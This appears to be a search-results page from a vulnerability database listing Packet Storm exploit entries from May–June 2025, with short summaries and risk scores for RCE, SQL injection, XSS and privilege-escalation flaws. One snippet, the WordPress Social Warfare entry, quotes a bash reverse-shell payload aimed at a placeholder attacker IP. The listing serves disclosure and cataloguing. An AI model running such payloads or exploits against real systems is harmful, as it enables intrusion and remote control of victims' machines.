Lucene search
K
PacketstormRecent

50738 matches found

Packet Storm
Packet Storm
โ€ขadded 2025/06/09 12:0 a.m.โ€ข103 views

๐Ÿ“„ TightVNC 2.8.83 Control Pipe Manipulation

TightVNC version 2.8.83 suffers from a control pipe manipulation vulnerability. Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation Date: 06/09/2025 Exploit Author: Ionut Zevedei [email protected] Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC Vendor Homepage:...

9.1CVSS7.3AI score0.02147EPSS
Exploits3
Packet Storm
Packet Storm
โ€ขadded 2025/06/09 12:0 a.m.โ€ข93 views

๐Ÿ“„ Remote for Mac 2025.7 Unauthenticated Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint. When authentication is disabled on the target system, it allows attackers to execute arbitrary AppleScript commands,...

9.4AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/09 12:0 a.m.โ€ข239 views

๐Ÿ“„ RAD FT Dell Firmware A00-00 Privilege Escalation

RAD FT Firmware versions A00-00 Build WP0000051154 and prior are susceptible to a privilege escalation vulnerability due to a failure to properly filter the user-supplied input through the .NET Profiler. Exploit name: RAD FT Dell Firmware Download link:...

7.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/09 12:0 a.m.โ€ข86 views

๐Ÿ“„ FUDForum 3.2.0 Command Injection

FUDForum version 3.2.0 suffers from a code injection vulnerability. Exploit Title: FUDForum 3.2.0 Command Injection Authenticated Exploit Author: tmrswrr Vendor Homepage: http://fudforum.org/ Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum3.2.0.zip/download Version : 3.2.0...

7.8AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/09 12:0 a.m.โ€ข92 views

๐Ÿ“„ vBulletin 4.x movepm PHP Object Injection

In vBulletin 4.x, a flawed security patch from 2014 has introduced a new post-auth PHP object injection vector by replacing serialize with jsonencode โ€” ironically making it possible to get vBulletin to sign attacker-controlled base64-encoded payloads, potentially allowing users to perform remote...

8.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/06 12:0 a.m.โ€ข148 views

๐Ÿ“„ Microsoft Windows Server 2025 JScript Engine Remote Code Execution

This proof of concept exploits a use-after-free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. !/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution...

7.5CVSS8.1AI score0.21562EPSS
Exploits7
Packet Storm
Packet Storm
โ€ขadded 2025/06/06 12:0 a.m.โ€ข119 views

๐Ÿ“„ macOS / iOS Local Privilege Escalation

This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, creates an admin user, and installs a persistent LaunchDaemon backdoor...

7.8CVSS8.2AI score0.18668EPSS
Exploits5
Packet Storm
Packet Storm
โ€ขadded 2025/06/06 12:0 a.m.โ€ข107 views

๐Ÿ“„ HRM 1.0 2025 Cross Site Scripting

HRM version 1.0 2025 suffers from a cross site scripting vulnerability. Titles: HRM-1.0 2025 Cross-site scripting reflected Author: nu11secur1ty Date: 06/06/2025 Vendor: https://github.com/oretnom23 Software:...

6.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/06 12:0 a.m.โ€ข86 views

๐Ÿ“„ Apache Tomcat 10.1.39 Denial of Service

Apache Tomcat version 10.1.39 suffers from a denial of service vulnerability. Exploit Title: Apache Tomcat 10.1.39 - Denial of Service DOS Author: Abdualhadi khalifa CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import ini...

7.5CVSS7.3AI score0.66933EPSS
Exploits5
Packet Storm
Packet Storm
โ€ขadded 2025/06/05 12:0 a.m.โ€ข89 views

๐Ÿ“„ ABB Cylon Aspect 3.08.04 DeploySource Unauthenticated Remote Code Execution

ABB Cylon Aspect BMS/BAS version 3.08.04 is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...

8.3AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/04 12:0 a.m.โ€ข74 views

๐Ÿ“„ Udev Persistence

This Metasploit module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. It will be executed with root privileges every time a network interface other than l0 comes up. This module requires Metasploit: https://metasploit.com/download Current source:...

7.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/04 12:0 a.m.โ€ข112 views

๐Ÿ“„ Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language...

8.8CVSS8.8AI score0.99891EPSS
Exploits10
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข93 views

๐Ÿ“„ Adapt CMS 3.0.3 Cross Site Scripting

Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability in the Send Message functionality. Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...

6.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข174 views

๐Ÿ“„ Adapt CMS 3.0.3 Remote Shell Upload

Adapt CMS version 3.0.3 suffers from a remote shell upload vulnerability. Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE 1:...

7.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข94 views

๐Ÿ“„ ERPNext 15.53.1 Cross Site Scripting

ERPNext version 15.53.1 suffers from multiple persistent cross site scripting vulnerabilities. An authenticated user can inject malicious JavaScript into the userimage field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient...

6.8AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข97 views

๐Ÿ“„ Adapt CMS 3.0.3 Cross Site Scripting

Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability via file upload. Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Stored XSS via...

6.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข260 views

๐Ÿ“„ PSF Request Library Credential Leak

The PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. The PSF requests library https://github.com/psf/requests & https://pypi.org/project/requests/ leaks .netrc credentials to third parties due to incorrect URL processing und...

5.3CVSS7.3AI score0.00846EPSS
Exploits1
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข88 views

๐Ÿ“„ Adapt CMS 3.0.3 Insecure Direct Object Reference / Incorrect Authorization

Adapt CMS version 3.0.3 suffers from an insecure direct object reference vulnerability that allows for privilege escalation. Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข113 views

๐Ÿ“„ WordPress Social Warfare 3.5.2 Remote Code Execution

Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...

6.1CVSS8.4AI score0.73543EPSS
Exploits18
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข134 views

๐Ÿ“„ Microsoft Windows Registry Protection Removal

Thanks to OFFREG.dll, every unprivileged user can copy the registry tree HKEYCURRENTUSER except of course the registry keys where the policies are stored to an offline registry hive ntuser.man and thus get rid of any restrictions previously imposed via user group policies after logging off and on...

7.3AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/03 12:0 a.m.โ€ข178 views

๐Ÿ“„ CloudClassroom PHP Project 1.0 SQL Injection

CloudClassroom PHP Project version 1.0 suffers from a time-based blind remote SQL Injection vulnerability. Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project:...

7.3CVSS8.8AI score0.00995EPSS
Exploits3
Packet Storm
Packet Storm
โ€ขadded 2025/06/02 12:0 a.m.โ€ข109 views

๐Ÿ“„ Motivian Content Management System 41.0.0 Arbitrary File Upload

Motivian Content Management System version 41.0.0 suffers from an arbitrary file upload vulnerability. CVE-2025-29093-Arbitrary-File-Upload This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29093: Arbitrary File Upload This...

8.2CVSS7.5AI score0.00511EPSS
Exploits2
Packet Storm
Packet Storm
โ€ขadded 2025/06/02 12:0 a.m.โ€ข92 views

๐Ÿ“„ WatchGuard 12.11 Memory Corruption

WatchGuard version 12.11 memory corruption proof of concept exploit. โ”€$ cat watchguard12.11postauthclibof.py !/usr/bin/env python3 watchguard12.11postauthclibof.py this is a poc for post authorized stack overflow found in 'cli' binary. Tue Feb 4 06:12:20 EST 2025 by code610 More: networkdevice=...

7.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/06/02 12:0 a.m.โ€ข90 views

๐Ÿ“„ Motivian Content Management System 41.0.0 Cross Site Scripting

Motivian Content Management System version 41.0.0 suffers from multiple cross site scripting vulnerabilities. CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094:...

6.1CVSS6.8AI score0.00311EPSS
Exploits3
Packet Storm
Packet Storm
โ€ขadded 2025/05/30 12:0 a.m.โ€ข93 views

๐Ÿ“„ Unifiedtransform 2.x Student Editor Missing Authorization

Unifiedtransform version 2.x allows any user to access and modify student records via the /students/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify student records via the /students/edit/id...

6.5CVSS7.3AI score0.0032EPSS
Exploits3
Packet Storm
Packet Storm
โ€ขadded 2025/05/30 12:0 a.m.โ€ข126 views

๐Ÿ“„ Unifiedtransform 2.x Course Editor Missing Authorization

Unifiedtransform version 2.x allows any user to access and modify course records via the /course/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify course details via the /course/edit/id endpoints...

6.5CVSS7.3AI score0.00345EPSS
Exploits2
Packet Storm
Packet Storm
โ€ขadded 2025/05/30 12:0 a.m.โ€ข88 views

๐Ÿ“„ RustFly 2.0.0 Remote Code Execution

RustFly version 2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution. RustFly v2.0.0- Remote Code Execution RCE Exploit Title: RustFly v2.0.0- Remote Code Execution RCE Date: 2025-05-29 Exploit Author:...

8.3AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/29 12:0 a.m.โ€ข83 views

๐Ÿ“„ Campcodes Online Hospital Management System 1.0 SQL Injection

Campcodes Online Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection Google Dork: N/A Exploit Author: Carine Constantino Vendor Homepage: https://www.campcodes.com Software Link:...

9.8CVSS8.5AI score0.00758EPSS
Exploits3
Packet Storm
Packet Storm
โ€ขadded 2025/05/29 12:0 a.m.โ€ข107 views

๐Ÿ“„ Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting

Kion Exchange Programs Software versions 1.21.9092.29966 and below suffer from a cross site scripting vulnerability. Exploit Title: Kion Exchange Programs Software Reflected XSS CVE: CVE-2024-7130 PoC-Date: 2025-05-28 Exploit Author: Kutay ERGEN Vendor Homepage: https://www.kionexchangeprograms.c...

5.5CVSS6.6AI score0.0035EPSS
Exploits1
Packet Storm
Packet Storm
โ€ขadded 2025/05/29 12:0 a.m.โ€ข86 views

๐Ÿ“„ Fortra GoAnywhere MFT 7.4.1 Authentication Bypass

Fortra GoAnywhere MFT version 7.4.1 proof of concept authentication bypass exploit. !/usr/bin/env python3 -- coding: utf-8 -- Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass Date: 2025-05-25 Exploit Author: @ibrahimsql Exploit Author's github: https://github.com/ibrahimsql Vend...

9.8CVSS7.7AI score0.95086EPSS
Exploits8
Packet Storm
Packet Storm
โ€ขadded 2025/05/29 12:0 a.m.โ€ข83 views

๐Ÿ“„ Automic Agent 24.3.0 HF4 Privilege Escalation

Automic Agent version 24.3.0 HF4 suffers from a privilege escalation vulnerability. Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation Date: 26.05.2025 Exploit Author: Flora Schรคfer Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation Version:...

8.5CVSS7.6AI score0.00516EPSS
Exploits2
Packet Storm
Packet Storm
โ€ขadded 2025/05/29 12:0 a.m.โ€ข93 views

๐Ÿ“„ Windows File Explorer NTLM Hash Disclosure

Windows File Explorer on Microsoft Windows 11 23H2 proof of concept NTLM hash disclosure exploit. !/usr/bin/env python3 Exploit Title: Windows File Explorer Windows 11 23H2 - NTLM Hash Disclosure Exploit Author: Mohammed Idrees Banyamer Twitter/GitHub:https://github.com/mbanyamer Date: 2025-05-27...

6.5CVSS7.2AI score0.25068EPSS
Exploits21
Packet Storm
Packet Storm
โ€ขadded 2025/05/28 12:0 a.m.โ€ข86 views

๐Ÿ“„ Remote for Mac 2025.6 Unauthenticated Arbitrary Input

Remote for Mac version 2025.6 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-28 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...

7.8AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/28 12:0 a.m.โ€ข117 views

๐Ÿ“„ eCharge Hardy Barth cPH2 / cPP2 Charging Stations 2.2.0 Command Injection / Backdoor

eCharge Hardy Barth cPH2 and cPP2 Charging Stations version 2.2.0 suffer from missing authentication, OS command injection, backdoor user accounts, backdoor functionality, and hardcoded key vulnerabilities. SEC Consult Vulnerability Lab Security Advisory...

8.1CVSS7.6AI score0.00962EPSS
Exploits1
Packet Storm
Packet Storm
โ€ขadded 2025/05/28 12:0 a.m.โ€ข209 views

๐Ÿ“„ Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization

A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS...

9.8CVSS8.4AI score0.92727EPSS
Exploits6
Packet Storm
Packet Storm
โ€ขadded 2025/05/28 12:0 a.m.โ€ข115 views

๐Ÿ“„ Frappe Framework 15.56.1 SQL Injection

Frappe Framework version 15.56.1 suffers from a remote SQL injection vulnerability. An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.getlist API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields...

8.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/27 12:0 a.m.โ€ข91 views

๐Ÿ“„ Remote for Mac 2025.6 Desktop Stream Disclosure

Remote for Mac version 2025.6 suffers from an unauthenticated desktop stream disclosure vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit Date: 2025-05-27 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...

7.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/27 12:0 a.m.โ€ข96 views

๐Ÿ“„ KRUKSTON BISTRO 1.0 SQL Injection

KRUKSTON BISTRO version 1.0 suffers from a remote SQL injection vulnerability. Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi Author: nu11secur1ty Date: 05/27/2025 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Reference:...

8.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/27 12:0 a.m.โ€ข104 views

๐Ÿ“„ Remote for Mac 2025.6 Remote Code Execution

Remote for Mac version 2025.6 allows an unauthenticated remote attacker to achieve remote code execution by sending a crafted sequence of UDP packets that simulate keyboard input. Exploit Title: Remote for Mac 2025.6 - Remote Code Execution RCE Date: 2025-05-27 Exploit Author: Chokri Hammedi Vend...

8.4AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข85 views

๐Ÿ“„ Remote for Windows 2024.15 Unauthenticated Arbitrary Input

Remote for Windows version 2024.15 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...

7.8AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข173 views

๐Ÿ“„ Remote for Mac 2025.6 Remote Code Execution

Remote for Mac version 2025.6 suffers from an unauthenticated remote code execution vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link: https://cherpake.com/latest.php?os=ma...

8.6AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข99 views

๐Ÿ“„ Java-springboot-codebase 1.1 Arbitrary File Read

Java-sprintboot-codebase version 1.1 suffers from an arbitrary file read vulnerability. Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read Google Dork: Date: 23/May/2025 Exploit Author: d3sca Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase Software Link:...

8.7CVSS7.1AI score0.03847EPSS
Exploits13
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข87 views

๐Ÿ“„ Remote for Windows 2024.15 Unquoted Service Path

Remote for Windows version 2024.15 suffers from an unquoted service path vulnerability. Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link: https://rs.ltd/latest.php?os=win Version: 2024.1...

7.5AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข83 views

๐Ÿ“„ Remote for Mac 2025.6 Desktop Screenshot Capture

Remote for Mac version 2025.6 suffers from an unauthenticated desktop screenshot capture vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...

7.7AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข96 views

๐Ÿ“„ WordPress User Registration and Membership 4.1.2 Authentication Bypass

WordPress User Registration and Membership plugin versions 4.1.2 and below suffer from an authentication bypass vulnerability. !/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Date: 2025-05-22 Exploit Author: Mohammed Idrees Banyam...

8.1CVSS7.6AI score0.07248EPSS
Exploits4
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข99 views

๐Ÿ“„ vBulletin replaceAdTemplate Remote Code Execution

vBulletin replaceAdTemplate remote code execution proof of concept exploit. Versions 5.0.0 through 6.0.3 are affected. ?php / ----------------------------------------------------------------- vBulletin replaceAdTemplate Remote Code Execution Vulnerability...

8.3AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข114 views

๐Ÿ“„ Palo Alto 11.1.4-h7 Memory Corruption

Palo Alto version 11.1.4-h7 post authentication memory corruption proof of concept exploit. !/usr/bin/env python3 post auth cli memory corruption poc for paloalto 11.1.4-h7 19.01.2025 @ 00:23 postauth user in general 'admin' but we'll get back to that later ; can use cli to provide one of the...

7.8AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/26 12:0 a.m.โ€ข88 views

๐Ÿ“„ Grandstream GSD3710 1.0.11.13 Stack Buffer Overflow

Grandstream GSD3710 version 1.0.11.13 suffers from a stack buffer overflow vulnerability. !/usr/bin/env python3 Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow Google Dork: if applicable Date: 2025-05-23 Exploit Author: Pepelux user in ExploitDB Vendor Homepage:...

9.8CVSS7.8AI score0.04418EPSS
Exploits2
Packet Storm
Packet Storm
โ€ขadded 2025/05/23 12:0 a.m.โ€ข86 views

๐Ÿ“„ ABB Cylon Aspect 3.08.03 projectUpdateBSXFileProcess.php Remote Guest2Root

The ABB BMS/BAS controller is vulnerable to code execution and sudo misconfiguration flaws. An authenticated remote code execution vulnerability in the firmware update mechanism allows an attacker with valid credentials to escalate privileges and execute commands as root. The process involves...

8.7AI score
Exploits0
Packet Storm
Packet Storm
โ€ขadded 2025/05/23 12:0 a.m.โ€ข79 views

๐Ÿ“„ ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution

The ABB BMS/BAS controller suffers from an authenticated blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'instance' HTTP POST parameter called by the productRemovalUpdate.php script. The token key POST param needs to be se...

8.4AI score
Exploits0
Total number of security vulnerabilities50738